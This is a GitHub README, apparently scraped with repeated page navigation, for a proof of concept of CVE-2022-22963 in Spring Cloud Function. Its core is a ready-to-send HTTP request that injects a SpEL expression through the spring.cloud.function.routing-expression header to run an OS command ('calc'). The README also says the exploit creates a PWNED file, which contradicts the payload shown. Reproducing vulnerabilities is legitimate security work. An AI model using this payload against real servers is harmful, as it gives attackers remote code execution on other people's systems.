CVE-2022-22963 RCE PoC

Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.

Exploit

Run the server

直接用idea 打开启动就可以了

Make a request

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

As a result of the exploit file PWNED will be crated nearby pom.xml.

Additional info

Original advisory: https://tanzu.vmware.com/security/cve-2022-22963
Snyk advisory: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645
This PoC is based on: https://github.com/Pizz33/Spring-Cloud-Function-SpEL

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
src/main		src/main
.gitignore		.gitignore
README.md		README.md
pom.xml		pom.xml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2022-22963 RCE PoC

Exploit

Run the server

Make a request

Additional info

About

Releases

Packages

Languages

75ACOL/CVE-2022-22963-PoC

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-22963 RCE PoC

Exploit

Run the server

Make a request

Additional info

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages